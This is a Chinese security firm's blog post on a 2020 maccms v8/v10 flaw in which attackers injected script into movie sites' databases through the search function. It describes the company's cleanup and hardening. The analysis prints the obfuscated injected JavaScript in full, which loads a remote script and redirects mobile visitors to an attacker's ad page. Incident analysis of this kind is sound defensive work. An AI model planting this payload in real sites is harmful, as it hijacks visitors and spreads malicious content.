蘋果CMS v8 v10漏洞EXP掛馬解決辦法

時間：2020-03-13作者：青島四海通達電子科技有限公司瀏覽：1041

蘋果CMS漏洞是越來越多了，國內(nèi)很多電影網(wǎng)站都使用的是maccms V10 V8版本，就在2020年初該maccms漏洞爆發(fā)了，目前較少數(shù)的攻擊者掌握了該EXP POC，受該BUG的影響，百分之80的電影站都被攻擊了，很多電影站的站長找到我們SINE安全來解決網(wǎng)站被掛馬的問題，通過分析我們發(fā)現(xiàn)大部分客戶網(wǎng)站在數(shù)據(jù)庫中都被插入了掛馬代碼，<script src=///js/tjj.js></script><script src=///1.js</script>，尤其電影片名d_name值被直接篡改，并且是批量掛馬，導(dǎo)致用戶打開網(wǎng)站訪問直接彈窗廣告并跳轉(zhuǎn)。

JS掛馬代碼如下：

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>3

5?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e

(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)

if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('4.5(\'<6 1="3/2"

7="http://0.b.c.d/8.0"><\\/9\'+\'a>\');',14,14,'js|type|javascript|text|document|write|script

|src|20569875|scr|ipt|users|51|la'.split('|'),0,{}));var abcdefg=navigator["userAgent

"]["toLowerCase"]()["match"](/(ipod|iphone|ipad|android|coolpad|mmp|smartphon

e|midp|wap|xoom|symbian|j2me|blackberry|wince)/i)!=null;if(abcdefg){setTimeout(

'window.location.href="http://:168/index.html?u=80666"',500)}

上面惡意代碼對訪問用戶進行了判斷，如果是手機端的，IOS，安卓，以及平板都會跳轉(zhuǎn)到攻擊者設(shè)置好的廣告網(wǎng)頁當中去:168/index.html?u=80666就是跳轉(zhuǎn)到這里，根據(jù)我們SINE安全技術(shù)的分析與統(tǒng)計，大部分被攻擊的網(wǎng)站跳轉(zhuǎn)都是168端口的網(wǎng)址上，域名經(jīng)常變換，但是168端口沒有變，可以看出是同一個攻擊者所為。

電影網(wǎng)站被掛馬的特征就是以上這些情況，根據(jù)客戶的反饋以及提供服務(wù)器IP，root賬號密碼后，我們進去對蘋果cms的源代碼進行了全面的人工安全審計，在網(wǎng)站的根目錄下生成了webshell網(wǎng)站木馬后門文件，在緩存目錄中也發(fā)現(xiàn)了同樣的網(wǎng)站木馬，繼續(xù)溯源追蹤，查看nginx網(wǎng)站日志，發(fā)現(xiàn)用的是同樣的手段，我們SINE安全技術(shù)再熟悉不過了，通過post index.php搜索功能進行插入數(shù)據(jù)庫并嵌入掛馬代碼，漏洞產(chǎn)生的原因是電影搜索里可以插入惡意代碼，攻擊者將惡意代碼加密后，不管你服務(wù)器用云鎖，還是寶塔，安全狗，都是攔截不了的，還是會被篡改。

我們SINE安全技術(shù)隨即對客戶的蘋果CMS漏洞進行了修復(fù)，對POST過來的數(shù)據(jù)進行了嚴格的安全過濾與檢測，對攻擊者加密的代碼也進行了特征定位攔截。只要包含了該惡意內(nèi)容，直接攔截并返回錯誤提示。對網(wǎng)站根目錄下存在的webshell也進行了刪除。對客戶網(wǎng)站的緩存目錄，以及圖片目錄，JS目錄都做了安全部署與加固，防止php腳本文件在網(wǎng)站的運行，對網(wǎng)站的管理員后臺進行了權(quán)限分離，較新采集，與網(wǎng)站**訪問使用2個數(shù)據(jù)庫賬號，1個只讀權(quán)限的數(shù)據(jù)庫賬號，1個后臺采集可寫的數(shù)據(jù)庫賬號，這在安全層面上來說，網(wǎng)站安全等級較高了，一般攻擊者無法攻擊與篡改。我們即修復(fù)了漏洞，也做了安全攔截與多層次的安全加固部署，至此客戶網(wǎng)站數(shù)據(jù)庫被掛馬的問題得以解決。

有很多客戶的電影網(wǎng)站都到maccms官方進行了較新與補丁下載，但安裝后還是會繼續(xù)被掛馬，這里跟大家說一下，目前官方的漏洞補丁對此次數(shù)據(jù)庫掛馬漏洞是沒有任何效果的。如果不知道如何對蘋果cms漏洞進行修復(fù)以及打補丁，建議找專業(yè)的網(wǎng)站安全公司來處理，對index.php搜索功能這里做安全過濾與攔截，對加密的特征碼進行解密定位，較新到攔截黑名單中，即可修復(fù)該蘋果CMS漏洞。


青島四海通達電子科技有限公司專注于服務(wù)器安全,網(wǎng)絡(luò)安全公司,網(wǎng)站安全防護,網(wǎng)站漏洞檢測,滲透測試,網(wǎng)站安全,網(wǎng)站漏洞掃描,網(wǎng)站安全檢測等, 歡迎致電 13280888826

• 詞條

  詞條說明

• 網(wǎng)站被黑客攻擊 該如何查殺網(wǎng)站木馬文件webshell？

  在快速發(fā)展的移動互聯(lián)網(wǎng)今天，受疫情的影響，大部分人都在家遠程辦公，依靠于移動互聯(lián)網(wǎng)，許多的公司較不樂意見到的便是自個耗費精力設(shè)計的企業(yè)官網(wǎng)，在都還沒有為公司賺的相應(yīng)的收益的情況下，就已經(jīng)被掛黑客攻擊導(dǎo)致網(wǎng)站被掛木馬，而且據(jù)SINE安全統(tǒng)計發(fā)現(xiàn)，現(xiàn)階段許多的公司針對網(wǎng)站開發(fā)并不是很了解，不明白怎樣監(jiān)控和防止企業(yè)網(wǎng)站被攻擊，被掛馬的發(fā)生，因此，SINE安全工程師今日刻意為各位小結(jié)一點有關(guān)于網(wǎng)站安全監(jiān)測

• 聚合支付平臺網(wǎng)站安全漏洞防護 防止訂單數(shù)據(jù)被篡改

  2020春節(jié)即將來臨,收到新第三方支付平臺網(wǎng)站客戶的安全漏洞問題的求助電話給我們Sinesafe的BOSS,反映支付訂單狀態(tài)被修改由原先未支付修改為已支付,導(dǎo)致商戶那邊直接發(fā)貨給此訂單會員了,商戶和平臺的利益收到很大的影響，很多碼商都不敢用此支付平臺合作了，大體情況了解后我們立即安排成立支付平臺安全應(yīng)急小組。分析并了解支付過程我們Sinesafe對整個第三方支付平臺網(wǎng)站的流程進行了分析如下,平臺首

• 該怎么學(xué)web滲透？

  先了解一下為什么需要滲透當我們談?wù)摪踩珪r，我們較常聽到的詞是 漏洞。當我**次開始做安全員時，我經(jīng)常對漏洞這個詞感到困惑，我相信你們中的許多人和我的讀者都會陷入困境。為了所有讀者的利益，我將首先澄清漏洞與筆試的區(qū)別。那么，什么是漏洞呢？漏洞是用來識別系統(tǒng)中可能受到安全威脅的缺陷的術(shù)語。漏洞掃描漏洞掃描使用戶能夠找出應(yīng)用程序中已知的弱點，并定義修復(fù)和提高應(yīng)用程序整體安全性的方法。它基本上可以確定安全

• 物聯(lián)網(wǎng)DDOS攻擊防護5G方案

  DDoS分布式拒絕服務(wù)攻擊，已經(jīng)變得越來越常見,越來越強大,很多攻擊者都在使用物聯(lián)網(wǎng)設(shè)備， 來建立更多的連接和帶寬，以及5G網(wǎng)絡(luò)跟云應(yīng)用的發(fā)展， 隨著暗網(wǎng)和加密貨幣的出現(xiàn)和匿名性，越來越多的人從暗網(wǎng)中發(fā)動DDOS攻擊。通過國外的報告顯示，他們發(fā)現(xiàn)大多數(shù)網(wǎng)絡(luò)犯罪的攻擊者都不是技術(shù)天才。他們中的許多人提供所謂的DDOS服務(wù)，基本上他們是被雇傭來的，而且可能已經(jīng)變得非常普遍，甚至包括學(xué)生，以及兒童。不是